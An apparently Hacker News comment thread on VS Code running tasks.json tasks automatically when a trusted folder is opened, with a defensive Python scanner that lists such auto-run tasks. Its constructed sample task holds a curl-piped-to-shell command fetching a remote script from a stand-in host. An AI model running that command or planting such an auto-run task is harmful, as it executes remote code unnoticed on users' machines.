Comment by dfajgljsldkjag
17 days ago
It is scary that a text editor can run hidden code just by opening a folder. We traded our safety for convenience and now we are paying the price. Users will always click the button to trust a file if they think it helps them work faster. We cannot blame them when the software design makes it so easy to make a mistake.
Tooooo be fair
Vim has also had its share of execution vulnerabilities over the years.
https://github.com/numirias/security/blob/master/doc/2019-06...
Yep, it's a shame that we keep making the same mistakes when it comes to basic security practices.
Was going to say the same thing about emacs: https://news.ycombinator.com/item?id=42256409
What is share dot google? Here's the real link: https://news.ycombinator.com/item?id=42256409
Doesn't it ask you if you trust a folder when you open it?
You are right that the computer asks you. But people click yes because they are used to ignoring warning signs. The software relies on people making perfect choices every time and that never happens.
It should tell me what I should look at before I trust it. Not trusting the workspace means I might as well use Notepad to open it. I wouldn't think that tasks.json includes autorun tasks in addition to build actions.
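The auto-run behaviour referred to above is the `runOptions.runOn: "folderOpen"` setting in `.vscode/tasks.json`, which VS Code honours once a workspace is trusted. Below is an added example, not code from this thread or from VS Code: a small Python scanner that answers "what should I look at before I trust it" by listing every task a folder would launch on open. The sample tasks.json is constructed for this example; the comment stripper exists because tasks.json is JSON-with-comments, which `json.loads` rejects.

```python
"""List tasks that VS Code would run automatically when a folder is opened.

Added example for this thread; the scanner and the sample tasks.json below
are constructed for illustration and are not part of VS Code.
"""
import json
from pathlib import Path


def strip_jsonc(text: str) -> str:
    """Remove // and /* */ comments and trailing commas outside string literals.

    A state machine rather than a regex, so that a '//' inside a string
    (e.g. the 'https://' in a command) is preserved.
    """
    out = []
    i, n, in_str = 0, len(text), False
    while i < n:
        c = text[i]
        if in_str:
            out.append(c)
            if c == "\\" and i + 1 < n:      # keep escaped char verbatim
                out.append(text[i + 1])
                i += 2
                continue
            if c == '"':
                in_str = False
            i += 1
        elif c == '"':
            in_str = True
            out.append(c)
            i += 1
        elif text.startswith("//", i):       # line comment
            j = text.find("\n", i)
            i = n if j == -1 else j
        elif text.startswith("/*", i):       # block comment
            j = text.find("*/", i + 2)
            i = n if j == -1 else j + 2
        elif c == ",":                       # drop a comma directly before } or ]
            j = i + 1
            while j < n and text[j] in " \t\r\n":
                j += 1
            if not (j < n and text[j] in "}]"):
                out.append(c)
            i += 1
        else:
            out.append(c)
            i += 1
    return "".join(out)


def auto_run_tasks(tasks_json_text: str) -> list:
    """Return the labels of tasks configured with runOptions.runOn == "folderOpen"."""
    doc = json.loads(strip_jsonc(tasks_json_text))
    found = []
    for task in doc.get("tasks", []):
        run_on = task.get("runOptions", {}).get("runOn")
        if run_on == "folderOpen":
            found.append(task.get("label", "<unlabelled>"))
    return found


def scan_folder(folder: str) -> list:
    """Check a checkout before trusting it: read .vscode/tasks.json if present."""
    path = Path(folder) / ".vscode" / "tasks.json"
    if not path.is_file():
        return []
    return auto_run_tasks(path.read_text(encoding="utf-8"))


# Constructed sample: one ordinary build task plus one task that fires on open.
SAMPLE_TASKS_JSON = r'''{
    // constructed .vscode/tasks.json for this example
    "version": "2.0.0",
    "tasks": [
        {
            "label": "build",
            "type": "shell",
            "command": "make",
            "group": "build",
        },
        {
            "label": "Bootstrap dev env",
            "type": "shell",
            "command": "curl -s https://example.invalid/setup.sh | sh", /* runs unprompted */
            "runOptions": { "runOn": "folderOpen" }
        }
    ]
}'''

if __name__ == "__main__":
    for label in auto_run_tasks(SAMPLE_TASKS_JSON):
        print(f"auto-run on folder open: {label}")
```

Run `scan_folder(".")` on a freshly cloned repo before clicking "Trust"; an empty list means no task is wired to folder open, while anything else deserves a read of the task's `command` first. The scanner only inspects `tasks.json`; workspace settings and extensions are separate trust surfaces.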
Who remembers autorun.exe
I always wondered why. Now I finally know that it auto runs code in that folder.
Who thought this is a good idea and why wasn't it specified in ALL CAPS in that dialog?
Is it even documented anywhere?
Very infrequent vscode user here, beginning to think it's some kind of Eclipse.
I mean it's not in caps, but it's literally the first line in the dialog after the header:
https://code.visualstudio.com/docs/editing/workspaces/worksp...
I'm big on user first, if that dialog had sirens blaring, a gif and ten arrows pointing at "THIS MAY EXECUTE CODE" and people still didn't get the idea, I'd say it needs fixing. It can't be said that they didn't try or that they hid it though.
Yeah but it's one of those useless permission requests along the lines of "Do you want this program to work or not?"
They're pawning off responsibility without giving people a real choice.
It's like the old permission dialog for Android that was pretty much "do you want to use this app?". Obviously most people just say yes.
There's a reason Google changed that.
To be fair I'm sure Microsoft would switch to a saner permission model if they could but it's kind of too late.
It's not a false choice - "Trust" and "don't trust" are both perfectly viable options. The editor works fine in restricted mode, you just won't have all your extensions enabled.
> We traded our safety for convenience
Not the first time. Same with LLMs.